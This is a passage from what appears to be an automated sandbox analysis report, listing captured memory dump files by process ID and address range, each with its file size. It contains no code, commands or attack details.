                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      9.1MB

                                                                                                                                                                                                                                    • memory/3432-2546-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      9.1MB

                                                                                                                                                                                                                                    • memory/3432-2557-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      9.1MB

                                                                                                                                                                                                                                    • memory/3704-318-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      864KB

                                                                                                                                                                                                                                    • memory/3704-301-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      864KB

                                                                                                                                                                                                                                    • memory/3704-305-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      864KB

                                                                                                                                                                                                                                    • memory/3832-300-0x0000000002F40000-0x000000000382B000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      8.9MB

                                                                                                                                                                                                                                    • memory/3832-1050-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      9.1MB

                                                                                                                                                                                                                                    • memory/3832-304-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      9.1MB

                                                                                                                                                                                                                                    • memory/3832-378-0x0000000002B30000-0x0000000002F33000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4.0MB

                                                                                                                                                                                                                                    • memory/3832-292-0x0000000002B30000-0x0000000002F33000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4.0MB

                                                                                                                                                                                                                                    • memory/3892-533-0x0000000010000000-0x0000000010569000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      5.4MB

                                                                                                                                                                                                                                    • memory/4168-380-0x0000000000AC0000-0x0000000000FA8000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4.9MB

                                                                                                                                                                                                                                    • memory/4184-546-0x000000007F1B0000-0x000000007F1C0000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                                    • memory/4184-379-0x0000000006D20000-0x0000000006D30000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                                    • memory/4184-366-0x0000000073E90000-0x000000007457E000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      6.9MB

                                                                                                                                                                                                                                    • memory/4184-548-0x000000006FAA0000-0x000000006FAEB000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      300KB

                                                                                                                                                                                                                                    • memory/4224-371-0x0000000000AC0000-0x0000000000FA8000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4.9MB

                                                                                                                                                                                                                                    • memory/4312-911-0x0000000000AC0000-0x0000000000FA8000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4.9MB

                                                                                                                                                                                                                                    • memory/4312-333-0x0000000000AC0000-0x0000000000FA8000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4.9MB

                                                                                                                                                                                                                                    • memory/4348-3407-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      9.1MB

                                                                                                                                                                                                                                    • memory/4348-3383-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      9.1MB

                                                                                                                                                                                                                                    • memory/4348-3403-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      9.1MB

                                                                                                                                                                                                                                    • memory/4348-3396-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      9.1MB

                                                                                                                                                                                                                                    • memory/4348-3415-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      9.1MB

                                                                                                                                                                                                                                    • memory/4456-10-0x0000000073E90000-0x000000007457E000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      6.9MB

                                                                                                                                                                                                                                    • memory/4456-13-0x0000000004FC0000-0x0000000004FD0000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                                    • memory/4456-296-0x0000000073E90000-0x000000007457E000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      6.9MB

                                                                                                                                                                                                                                    • memory/4456-8-0x0000000000400000-0x0000000000408000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      32KB

                                                                                                                                                                                                                                    • memory/4456-309-0x0000000004FC0000-0x0000000004FD0000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                                    • memory/4500-2-0x0000000073E90000-0x000000007457E000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      6.9MB

                                                                                                                                                                                                                                    • memory/4500-0-0x00000000003F0000-0x0000000000422000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      200KB

                                                                                                                                                                                                                                    • memory/4500-1-0x0000000004D50000-0x0000000004DEC000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      624KB

                                                                                                                                                                                                                                    • memory/4500-12-0x0000000073E90000-0x000000007457E000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      6.9MB

                                                                                                                                                                                                                                    • memory/4500-6-0x0000000005020000-0x000000000504C000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      176KB

                                                                                                                                                                                                                                    • memory/4500-4-0x0000000004E90000-0x0000000004F22000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      584KB

                                                                                                                                                                                                                                    • memory/4500-5-0x0000000004E60000-0x0000000004E70000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                                    • memory/4500-3-0x00000000052F0000-0x00000000057EE000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      5.0MB

                                                                                                                                                                                                                                    • memory/4500-7-0x0000000005050000-0x000000000506A000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      104KB

                                                                                                                                                                                                                                    • memory/4728-3410-0x0000000000400000-0x00000000008DF000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4.9MB

                                                                                                                                                                                                                                    • memory/4728-3398-0x0000000000400000-0x00000000008DF000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4.9MB

                                                                                                                                                                                                                                    • memory/4732-310-0x0000000002650000-0x0000000002651000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                    • memory/4732-317-0x0000000000400000-0x000000000071A000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      3.1MB

                                                                                                                                                                                                                                    • memory/4956-3417-0x0000000010000000-0x0000000010569000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      5.4MB

                                                                                                                                                                                                                                    • memory/5052-343-0x0000000006910000-0x0000000006920000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                                    • memory/5052-352-0x0000000007580000-0x00000000078D0000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      3.3MB

                                                                                                                                                                                                                                    • memory/5052-345-0x0000000006910000-0x0000000006920000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                                    • memory/5052-423-0x0000000008A00000-0x0000000008A3C000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      240KB

                                                                                                                                                                                                                                    • memory/5052-547-0x000000006E5B0000-0x000000006E900000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      3.3MB

                                                                                                                                                                                                                                    • memory/5052-381-0x00000000078D0000-0x000000000791B000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      300KB

                                                                                                                                                                                                                                    • memory/5052-545-0x000000007EF00000-0x000000007EF10000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                                    • memory/5052-544-0x000000006FAA0000-0x000000006FAEB000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      300KB

                                                                                                                                                                                                                                    • memory/5052-339-0x0000000073E90000-0x000000007457E000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      6.9MB